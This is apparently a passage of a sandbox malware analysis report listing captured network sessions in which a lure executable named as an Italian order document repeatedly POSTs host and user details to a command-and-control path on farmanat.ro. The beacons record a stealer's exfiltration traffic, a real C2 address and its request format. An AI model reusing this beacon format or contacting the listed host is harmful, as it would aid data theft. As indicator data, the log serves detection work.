Nov 25, 2021 10:55:10.597724915 CET	7465	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
836	192.168.11.20	50684	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:11.026772976 CET	7466	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:11.060522079 CET	7466	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:11.110959053 CET	7467	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
837	192.168.11.20	50685	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:11.540230036 CET	7467	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:11.574536085 CET	7468	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:11.624141932 CET	7468	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
838	192.168.11.20	50686	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:12.060169935 CET	7469	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:12.094419003 CET	7469	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:12.146275997 CET	7469	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
839	192.168.11.20	50687	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:12.564542055 CET	7470	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:12.598675966 CET	7470	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:12.648529053 CET	7471	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.11.20	49921	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:53.244343996 CET	6431	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:53.278525114 CET	6431	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:53.329240084 CET	6432	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
840	192.168.11.20	50688	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:13.073925972 CET	7471	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:13.107731104 CET	7471	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:13.157313108 CET	7472	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
841	192.168.11.20	50689	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:13.588603973 CET	7473	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:13.622864008 CET	7473	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:13.673353910 CET	7473	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
842	192.168.11.20	50690	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:14.101732016 CET	7474	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:14.135425091 CET	7474	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:14.191421986 CET	7475	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
843	192.168.11.20	50691	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:14.619405031 CET	7475	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:14.653337955 CET	7475	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:14.703444958 CET	7476	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
844	192.168.11.20	50692	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:15.119360924 CET	7477	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:15.152946949 CET	7477	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:15.205034971 CET	7477	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
845	192.168.11.20	50693	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:15.607177973 CET	7478	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:15.641587973 CET	7478	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:15.692130089 CET	7479	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
846	192.168.11.20	50694	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:16.105694056 CET	7479	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:16.140073061 CET	7479	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:16.196391106 CET	7480	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
847	192.168.11.20	50695	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:16.623550892 CET	7481	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:16.657157898 CET	7481	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:16.709078074 CET	7481	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
848	192.168.11.20	50696	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:17.136322021 CET	7482	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:17.169868946 CET	7482	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:17.227396965 CET	7482	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
849	192.168.11.20	50697	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:17.661093950 CET	7483	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:17.695328951 CET	7483	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:17.746172905 CET	7484	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.11.20	49922	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:53.818084002 CET	6433	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:53.852293015 CET	6433	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:53.902612925 CET	6433	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
850	192.168.11.20	50698	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:18.167114019 CET	7485	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:18.201083899 CET	7485	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:18.251601934 CET	7485	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
851	192.168.11.20	50699	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:18.649872065 CET	7486	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:18.683384895 CET	7486	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:18.732243061 CET	7486	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
852	192.168.11.20	50700	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:19.101720095 CET	7487	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:19.135749102 CET	7487	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:19.201625109 CET	7488	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
853	192.168.11.20	50701	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:19.627458096 CET	7489	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:19.661326885 CET	7489	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:19.716433048 CET	7489	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
854	192.168.11.20	50702	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
